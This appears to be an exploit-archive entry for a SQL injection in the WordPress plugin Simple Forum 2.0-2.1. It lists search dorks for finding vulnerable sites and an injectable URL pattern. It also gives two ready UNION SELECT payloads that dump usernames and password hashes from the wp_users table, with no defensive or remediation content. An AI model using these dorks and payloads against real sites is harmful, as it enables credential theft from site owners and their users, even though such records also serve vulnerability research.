Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability

2008-02-15T00:00:00
ID 1337DAY-ID-2645
Type zdt
Reporter [email protected]
Modified 2008-02-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability
=================================================================



###############################################################
#
# Simple Forum Version 2.0-2.1(sf-forum)
#
################################################################

DORKS 1 :

Simple Forum - Version 2.0 (Build 207)
Simple Forum - Surum 2.1 (Build 228)
Simple Forum - Version 2.1 (Build 236)

DORK 2 : allinurl: "sf-forum?forum"

################################################################
example :

http://www.xxx.com/sf-forum?forum=[exploit]

EXPLOIT 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

exploit 2 :

-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*





#  0day.today [2018-04-05]  #